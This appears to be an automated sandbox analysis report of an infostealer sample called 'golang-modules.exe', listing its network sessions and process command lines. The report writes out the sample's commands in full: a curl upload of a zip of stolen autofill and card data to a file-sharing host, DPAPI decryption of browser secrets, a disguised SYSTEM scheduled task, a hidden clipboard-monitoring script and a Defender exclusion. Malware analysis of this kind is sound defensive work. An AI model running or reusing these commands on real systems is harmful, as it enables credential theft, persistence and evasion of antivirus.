                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c60a784fbf86-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  134192.168.11.2049915104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:28.458731890 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:28.608803988 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:28 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c60f3b0cbf86-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  135192.168.11.2049916104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:29.270925999 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:29.417548895 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:29 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c6145e80455e-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  136192.168.11.2049917104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:30.130008936 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:30.273782969 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:30 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c619be504588-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  137192.168.11.2049918104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:30.879827976 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:31.043313026 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:30 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c61e6f150d06-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.11.204978149.13.193.1344438844C:\Windows\System32\curl.exe
                                  TimestampBytes transferredDirectionData
                                  2024-07-11 06:33:36 UTC218OUTPOST /upload HTTP/1.1
                                  Host: api.filedoge.com
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Content-Length: 2908
                                  Expect: 100-continue
                                  Content-Type: multipart/form-data;; boundary=------------------------37f7683b98389407
                                  2024-07-11 06:33:37 UTC25INHTTP/1.1 100 Continue
                                  2024-07-11 06:33:37 UTC157OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 37 66 37 36 38 33 62 39 38 33 38 39 34 30 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 45 4e 2d 38 38 37 38 34 39 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a
                                  Data Ascii: --------------------------37f7683b98389407Content-Disposition: form-data; name="file"; filename="EN-887849.zip"Content-Type: application/octet-stream
                                  2024-07-11 06:33:37 UTC2703OUTData Raw: 50 4b 03 04 14 00 00 08 00 00 2f 14 eb 58 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 00 41 75 74 6f 66 69 6c 6c 73 5c 50 4b 03 04 14 00 00 08 08 00 2f 14 eb 58 e0 10 9c b4 7d 00 00 00 83 01 00 00 17 00 00 00 41 75 74 6f 66 69 6c 6c 73 5c 41 75 74 6f 66 69 6c 6c 73 2e 74 78 74 b3 b1 b5 8d 76 ce 2f cb c9 c9 49 31 34 36 36 8f b5 b3 b5 b5 e3 e2 b2 45 03 5c 7e 89 b9 a9 56 0a 01 99 79 21 a9 15 25 86 5c 61 89 39 a5 40 7e 91 49 72 6e 21 97 63 41 41 4e 66 72 62 49 66 7e 9e 95 82 7b 7e 7e 7a 4e aa 82 4b 6a 5a 62 69 4e 09 01 83 8c 60 06 95 98 9b 95 24 53 60 90 31 cc a0 ca dc 72 a3 4a 0a 0c 32 81 1b 94 91 5e 91 45 81 41 a6 30 83 cc d3 ca 8a aa f0 1a 04 00 50 4b 03 04 14 00 00 08 00 00 2f 14 eb 58 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 43 61 72 64 73 5c 50
                                  Data Ascii: PK/XAutofills\PK/X}Autofills\Autofills.txtv/I1466E\~Vy!%\a9@~Irn!cAANfrbIf~{~~zNKjZbiN`$S`1rJ2^EA0PK/XCards\P
                                  2024-07-11 06:33:37 UTC48OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 37 66 37 36 38 33 62 39 38 33 38 39 34 30 37 2d 2d 0d 0a
                                  Data Ascii: --------------------------37f7683b98389407--
                                  2024-07-11 06:33:37 UTC327INHTTP/1.1 502 Bad Gateway
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Thu, 11 Jul 2024 06:33:37 GMT
                                  Content-Type: text/html
                                  Content-Length: 166
                                  Connection: close
                                  <html>
                                  <head><title>502 Bad Gateway</title></head>
                                  <body>
                                  <center><h1>502 Bad Gateway</h1></center>
                                  <hr><center>nginx/1.18.0 (Ubuntu)</center>
                                  </body>
                                  </html>


                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Click to jump to process

                                  Target ID:0
                                  Start time:02:33:12
                                  Start date:11/07/2024
                                  Path:C:\Users\user\Desktop\golang-modules.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user\Desktop\golang-modules.exe"
                                  Imagebase:0x7ff626240000
                                  File size:39'414'942 bytes
                                  MD5 hash:5267DCDB0D72961DAC15CBBAEAE52A23
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:false

                                  Target ID:2
                                  Start time:02:33:13
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7aad40000
                                  File size:875'008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:3
                                  Start time:02:33:19
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:4
                                  Start time:02:33:19
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:5
                                  Start time:02:33:19
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell.exe -noprofile -
                                  Imagebase:0x7ff6c6f50000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:6
                                  Start time:02:33:20
                                  Start date:11/07/2024
                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oauixwyt\oauixwyt.cmdline"
                                  Imagebase:0x7ff767070000
                                  File size:2'759'232 bytes
                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:7
                                  Start time:02:33:20
                                  Start date:11/07/2024
                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES57FC.tmp" "c:\Users\user\AppData\Local\Temp\oauixwyt\CSC1DE16476F16E4E708A1B2D331C6787A.TMP"
                                  Imagebase:0x7ff691b50000
                                  File size:52'744 bytes
                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:8
                                  Start time:02:33:21
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
                                  Imagebase:0x7ff7fa690000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:9
                                  Start time:02:33:21
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\curl.exe
                                  Wow64 process (32bit):false
                                  Commandline:curl http://api.ipify.org/ --ssl-no-revoke
                                  Imagebase:0x7ff6c9c40000
                                  File size:421'376 bytes
                                  MD5 hash:1C3645EBDDBE2DA6A32A5F9FB43A3C23
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:10
                                  Start time:02:33:21
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:11
                                  Start time:02:33:21
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\tasklist.exe
                                  Wow64 process (32bit):false
                                  Commandline:tasklist
                                  Imagebase:0x7ff6dd8c0000
                                  File size:106'496 bytes
                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:12
                                  Start time:02:33:21
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:13
                                  Start time:02:33:21
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,136,189,34,74,147,133,60,232,14,60,255,73,188,213,48,222,168,142,253,158,248,133,177,139,88,77,61,151,164,102,155,199,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,5,0,199,30,189,167,167,11,187,110,144,216,122,248,70,97,140,73,214,114,118,171,5,17,181,195,185,79,195,66,51,65,48,0,0,0,136,212,114,34,12,100,149,93,133,55,135,123,14,54,78,227,90,179,39,207,67,251,86,83,147,108,45,88,219,161,237,51,30,59,93,206,64,185,123,13,105,154,32,135,149,44,94,219,64,0,0,0,199,49,210,98,232,67,7,168,248,100,118,31,55,2,255,180,150,58,185,169,41,93,199,129,193,83,93,21,116,52,166,144,1,169,141,205,12,19,247,89,22,244,86,254,137,103,207,81,105,218,121,206,85,43,186,110,147,124,58,17,202,177,238,15), $null, 'CurrentUser')"
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:14
                                  Start time:02:33:21
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\tasklist.exe
                                  Wow64 process (32bit):false
                                  Commandline:tasklist
                                  Imagebase:0x7ff6dd8c0000
                                  File size:106'496 bytes
                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:15
                                  Start time:02:33:21
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,136,189,34,74,147,133,60,232,14,60,255,73,188,213,48,222,168,142,253,158,248,133,177,139,88,77,61,151,164,102,155,199,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,5,0,199,30,189,167,167,11,187,110,144,216,122,248,70,97,140,73,214,114,118,171,5,17,181,195,185,79,195,66,51,65,48,0,0,0,136,212,114,34,12,100,149,93,133,55,135,123,14,54,78,227,90,179,39,207,67,251,86,83,147,108,45,88,219,161,237,51,30,59,93,206,64,185,123,13,105,154,32,135,149,44,94,219,64,0,0,0,199,49,210,98,232,67,7,168,248,100,118,31,55,2,255,180,150,58,185,169,41,93,199,129,193,83,93,21,116,52,166,144,1,169,141,205,12,19,247,89,22,244,86,254,137,103,207,81,105,218,121,206,85,43,186,110,147,124,58,17,202,177,238,15), $null, 'CurrentUser')
                                  Imagebase:0x7ff6c6f50000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:16
                                  Start time:02:33:24
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')"
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:17
                                  Start time:02:33:24
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')
                                  Imagebase:0x7ff6c6f50000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:18
                                  Start time:02:33:30
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:19
                                  Start time:02:33:30
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                  Wow64 process (32bit):false
                                  Commandline:wmic diskdrive get serialnumber
                                  Imagebase:0x7ff6915f0000
                                  File size:526'848 bytes
                                  MD5 hash:A2EF3F0AD95FDA9262A5F9533B6DD1BD
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:20
                                  Start time:02:33:30
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:21
                                  Start time:02:33:30
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\reg.exe
                                  Wow64 process (32bit):false
                                  Commandline:reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
                                  Imagebase:0x7ff670c10000
                                  File size:77'312 bytes
                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:22
                                  Start time:02:33:30
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:23
                                  Start time:02:33:30
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\schtasks.exe
                                  Wow64 process (32bit):false
                                  Commandline:schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
                                  Imagebase:0x7ff7251e0000
                                  File size:235'008 bytes
                                  MD5 hash:796B784E98008854C27F4B18D287BA30
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:24
                                  Start time:02:33:30
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:25
                                  Start time:02:33:30
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
                                  Imagebase:0x7ff6c6f50000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:26
                                  Start time:02:33:30
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:27
                                  Start time:02:33:30
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                  Wow64 process (32bit):false
                                  Commandline:wmic bios get smbiosbiosversion
                                  Imagebase:0x7ff6915f0000
                                  File size:526'848 bytes
                                  MD5 hash:A2EF3F0AD95FDA9262A5F9533B6DD1BD
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:28
                                  Start time:02:33:30
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:29
                                  Start time:02:33:30
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
                                  Imagebase:0x7ff766e20000
                                  File size:161'280 bytes
                                  MD5 hash:B8454647EFC71192BF7B1572D18F7BD8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:30
                                  Start time:02:33:31
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:31
                                  Start time:02:33:31
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7aad40000
                                  File size:875'008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:32
                                  Start time:02:33:31
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
                                  Imagebase:0x7ff6c6f50000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:33
                                  Start time:02:33:31
                                  Start date:11/07/2024
                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wy53vvk1\wy53vvk1.cmdline"
                                  Imagebase:0x7ff767070000
                                  File size:2'759'232 bytes
                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:34
                                  Start time:02:33:31
                                  Start date:11/07/2024
                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES82F4.tmp" "c:\Users\user\AppData\Local\Temp\wy53vvk1\CSC3C5D7F16B844BD8853D45FBCDF88AC3.TMP"
                                  Imagebase:0x7ff691b50000
                                  File size:52'744 bytes
                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                  Has elevated privileges:true
